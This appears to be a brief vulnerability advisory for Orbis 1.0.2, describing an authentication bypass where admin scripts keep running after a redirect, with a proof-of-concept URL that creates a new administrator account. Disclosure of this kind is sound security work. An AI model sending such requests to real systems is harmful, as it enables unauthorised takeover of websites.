Search
Software Vulnerability Tested On Date
Orbis 1.0.2 Authentication Bypass Windows Vista + XAMPP 7/6/2010
Description
A vulnerability in Orbis 1.0.2 can be exploited to create a new admin.
Exploit
Several admin related scripts fail to terminate after setting the header location field.
Proof of Concept
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@